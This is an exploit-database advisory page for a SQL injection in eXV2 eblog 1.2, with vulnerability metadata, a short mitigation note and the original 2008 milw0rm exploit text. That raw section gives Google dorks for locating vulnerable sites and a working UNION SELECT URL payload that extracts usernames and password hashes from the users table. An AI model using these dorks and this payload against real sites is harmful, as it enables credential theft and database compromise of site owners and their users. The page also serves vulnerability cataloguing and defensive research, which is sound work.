Powered by eXV2 eblog 1.2 SQL Injection

vendor:

eXV2 eblog

by:

S@BUN

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: eXV2 eblog

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: NO

Related CWE: N/A

CPE: a:exv2:exv2_eblog:1.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Powered by eXV2 eblog 1.2 SQL Injection

A SQL injection vulnerability exists in eXV2 eblog 1.2. An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to the database and potentially access sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should use parameterized queries to prevent SQL injection.

Source

Exploit-DB raw data:

##########################################
#
# Powered by eXV2 eblog 1.2 SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAÄ°L : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORKS 1 : allinurl :"modules/eblog"
#
# DORK 2 : allinurl :"exoops/modules/eblog"
#
###########################################
EXPLOIT :

modules/eblog/index.php?blog_id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass)/**/from/**/e_xoops_users/*where%20exv2_admin%201

###########################################

category: eXV2 - Module 1.2
Submit date: 2008/2/22
Version :1.2

###########################################
##################S@BUN####################
###########################################
#####hackturkiye.hackturkiye@gmail.com#####
###########################################

# milw0rm.com [2008-03-14]